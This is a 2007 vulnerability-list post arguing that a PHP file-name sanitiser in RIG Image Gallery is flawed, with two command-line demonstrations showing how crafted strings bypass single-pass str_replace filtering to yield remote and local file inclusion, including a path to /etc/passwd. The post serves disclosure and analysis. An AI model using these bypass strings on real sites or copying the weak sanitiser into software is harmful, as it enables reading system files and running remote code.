[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
ascii
ascii at katamail.com
Tue Jul 31 15:09:41 UTC 2007
George A. Theall wrote:
> But regardless, the str_replace() later on in rig_check_src_file()
> would certainly void the possibility of a remote file include attack.
I'm not saying that the product is vulnerable, but that this statement
is completely flawed: rig_check_src_file() is mostly useless (an assumption
based on George's code snippet; I haven't downloaded the original
script).
function rig_check_src_file($name) {
    ...
    // single-pass replacements: "..." still yields "..", "http:/:///" still yields "http://"
    $name = str_replace("..", ".", str_replace("://", "", $name));
    ...
    return $name;
}
This alone permits both local and remote file inclusions:
Example a) Remote file inclusion
php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".", str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
http://www.tin.it/
Warning: require_once(): URL file-access is disabled in the server configuration in Command line code on line 1
Warning: require_once(http://www.tin.it/): failed to open stream: no suitable wrapper could be found in Command line code on line 1
Fatal error: require_once(): Failed opening required 'http://www.tin.it/' (include_path='.:/usr/share/php5:/usr/share/php') in Command line code on line 1
Example b) Local file inclusion
php -r '$name=".../.../.../etc/passwd"; $name = str_replace("..", ".", str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
../../../etc/passwd
Warning: require_once(../../../etc/passwd): failed to open stream: No such file or directory in Command line code on line 1
Fatal error: require_once(): Failed opening required '../../../etc/passwd' (include_path='.:/usr/share/php5:/usr/share/php') in Command line code on line 1
Best regards,
Francesco `ascii` Ongaro
http://www.ush.it/